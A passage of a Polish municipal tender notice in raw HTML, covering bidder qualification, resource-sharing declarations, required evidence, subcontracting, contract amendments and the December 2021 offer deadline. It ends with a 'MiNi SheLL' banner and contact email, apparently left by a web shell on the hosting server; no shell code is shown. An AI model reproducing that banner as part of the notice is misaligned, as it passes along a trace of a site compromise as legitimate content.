tych<br/>zasobów oraz określa w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>6.7. Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na<br/>wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>art. 112 ust. 2 pkt 3 i 4 ustawy Pzp, a także bada, czy nie zachodzą wobec tego podmiotu<br/>podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>6.8. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w<br/>postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda,aby wykonawca w terminie określonym przez zamawiającego:<br/>a) zastąpił ten podmiot innym podmiotem lub podmiotami,<br/>b) albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu,<br/>6.9. Wykonawca nie może po upływie terminu składania ofert, powołać się na zdolność lub<br/>sytuację podmiotów udostępniających zasoby jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolności lub sytuacji podmiotów udostępniających zasoby.<br/>6.10. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. konsorcja, spółki<br/>cywilne).<br/>6.11. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których<br/>mowa pkt 5 SWZ.<br/>b) warunki udziału w postępowaniu określone w pkt 6.1. SWZ winien spełniać co najmniej jeden<br/>z tych Wykonawców albo wszyscy Wykonawcy występujący wspólnie:<br/>-w przypadku określonym w pkt. 6.1.4. lit. a) warunek musi spełniać w całości (samodzielnie)<br/>jeden z Wykonawców<br/>- przypadku określonym w pkt. 6.1.4. lit. b) spełnienie warunku oceniane będzie łącznie.<br/>6.12. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Jeżeli dokumenty, o których mowa wystawione zostały jako dokumenty elektroniczne, przekazuje się te<br/>dokumenty.<br/>7.5.3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast odpisu lub informacji z Krajowego Rejestru Sadowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej- składa dokument lub dokumenty wystawione w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego<br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury - wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>7.6. Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z<br/>tłumaczeniem na język polski.<br/>7.7. Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>7.8. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>7.9. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile Wykonawca wskazał w oświadczeniu wstępnym ( art. 125 ust. 1 ustawy Pzp) lub w<br/>ofercie dane umożliwiające dostęp do tych środków.<br/>7.10. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu<br/>(w tym pełnomocnictw) lub są one niekompletne lub zawierają błędy, Zamawiający wzywa Wykonawcę<br/>odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba, że oferta<br/>Wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lubzachodzą przesłanki unieważnienia postępowania.<br/>7.11. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych<br/>na dzień ich złożenia.<br/>7.12. Wzory załączników dołączonych do niniejszej SWZ powinny zostać wypełnione przez<br/>Wykonawcę i dołączone do oferty, bądź złożone na właściwym etapie postępowania – zgodnie z<br/>postanowieniami SWZ.<br/>7.13. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu, zastosowanie mają przepisy rozporządzenia Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz<br/>rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp, o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym<br/>przez Zamawiającego.<br/>a) Oświadczenie stanowi dowód potwierdzający brak podstaw do wykluczenia i spełnienie warunków<br/>udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane<br/>przez Zamawiającego podmiotowe środki dowodowe.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków<br/>udziału w postępowaniu w zakresie w jakim każdy z Wykonawców wskazuje spełnienie warunków<br/>udziału.<br/>c) Przedmiotowe oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ.<br/>d) Oświadczenie o którym mowa w art. 125 ust. 1 ustawy Pzp składa się pod rygorem nieważności w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym osoby upoważnionej do reprezentowania Wykonawcy zgodnie z formą reprezentacji<br/>określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>2) Oświadczenie podmiotu udostępniającego zasoby (jeśli dotyczy).<br/>a) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>Wykonawca przedstawia wraz ze swoim oświadczeniem z art. 125 ust.1 ustawy Pzp, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>b) Przedmiotowe oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 3a do<br/>SWZ.<br/>c) Oświadczenie składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. W przypadku gdy oświadczenie zostało sporządzone jako<br/>dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie, rozumieć należy dokument<br/>elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający<br/>zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje<br/>podmiot udostępniający zasoby lub notariusz.<br/>3) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w<br/>art. 117 ust. 4 ustawy Pzp (jeśli dotyczy).<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W takiej sytuacji Wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>a) Przedmiotowy wykaz należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ.<br/>c) Wykaz robót budowlanych składa się w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>d)Podmiotowe środki dowodowe (dowody określające, czy roboty budowlane zostały wykonane<br/>należycie sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane),<br/>przekazuje się jako dokument elektroniczny, jeżeli tak zostały sporządzone, a jeżeli zostały<br/>sporządzone w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się<br/>cyfrowe odwzorowanie takich dokumentów opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie,<br/>rozumieć należy dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci<br/>papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności<br/>bezpośredniego dostępu do oryginału. Poświadczenia zgodności cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej, dokonuje odpowiednio Wykonawca lub Wykonawca<br/>wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby, w zakresie<br/>podmiotowych środków dowodowych, które każdego z nich dotyczą, zawsze- notariusz.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.<br/>a) Przedmiotowy wykaz należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 7 do SWZ.<br/>b) Wykaz osób składa się w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>c) Podmiotowe środki dowodowe, przekazuje się jako dokument elektroniczny, jeżeli tak zostały<br/>sporządzone, a jeżeli zostały sporządzone w postaci papierowej i opatrzone własnoręcznym<br/>podpisem, przekazuje się cyfrowe odwzorowanie takich dokumentów opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym<br/>zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe<br/>odwzorowanie, rozumieć należy dokument elektroniczny będący kopią elektroniczną treści<br/>zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez<br/>konieczności bezpośredniego dostępu do oryginału. Poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej, dokonuje odpowiednio Wykonawca lub<br/>Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby,<br/>w zakresie podmiotowych środków dowodowych, które każdego z nich dotyczą, zawszenotariusz.<br/>7.5.2. Brak podstaw do wykluczenia:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 12.2. W przypadku zamiaru powierzenia podwykonawcy wykonania części robót, wykonawca<br/>jest zobowiązany poinformować o tym Zamawiającego poprzez dokonanie stosownego zapisu w<br/>formularzu ofertowym, z podaniem części zamówienia, których wykonanie zamierza powierzyć<br/>podwykonawcom wraz z określeniem przez Wykonawcę firm podwykonawców (jeżeli są znane<br/>na etapie składania ofert).<br/>12.3. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby<br/>wykonawca powoływał się, na zasadach określonych w art. 118 ustawy, w celu wykazania<br/>spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać<br/>zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je<br/>w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w<br/>trakcie postępowania o udzielenie zamówienia.<br/>12.4. Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich<br/>za roboty wykonane przez podwykonawców<br/>12.5. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę<br/>kluczowych części zadania.<br/>12.6. W sprawach nieuregulowanych w postanowieniach punktu 12 SWZ, szczegółowe<br/>wymagania dotyczące podwykonawców regulują załączony do SWZ projekt umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający dopuszcza możliwość zmiany umowy w sytuacjach wyjątkowych przewidzianych<br/>w art. 455 Pzp.<br/>3. Zamawiający dopuszcza możliwość wprowadzenia zmian do treści umowy pod następującymi<br/>warunkami:<br/>1) Zamawiający wyrazi zgodę na zmianę Umowy,<br/>2) konieczność dokonania zmian uzasadniona będzie co najmniej jedną z okoliczności<br/>wskazanych w ust. 4.<br/>3) Strona występująca o zmianę postanowień niniejszej umowy zobowiązana jest do<br/>udokumentowania zaistnienia okoliczności, o których mowa w ust. 4.<br/>4. Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian do treści umowy w<br/>szczególności i w następujących sytuacjach:<br/>1) zachodzi konieczność zmiany terminu częściowego wykonania lub terminu końcowego<br/>wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego przewidzieć w chwili<br/>podpisania umowy,2) niezbędna jest zmiana sposobu wykonania umowy, o ile zmiana taka jest korzystna dla<br/>Zamawiającego, lub jest konieczna w celu prawidłowego wykonania umowy,<br/>3) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację przedmiotu zamówienia,<br/>4) konieczne okaże się wydłużenie terminu realizacji umowy, z przyczyn organizacyjnych<br/>leżących po stronie Zamawiającego, w związku z niemożliwością realizacji przedmiotu<br/>zamówienia w zakładanym terminie,<br/>5) wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie<br/>można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i<br/>doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,<br/>6) z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej bezpośredni<br/>wpływ na terminowość wykonywania zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">: URZĄD GMINY LEGNICKIE: (/0x9ekme31w/skrytka)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com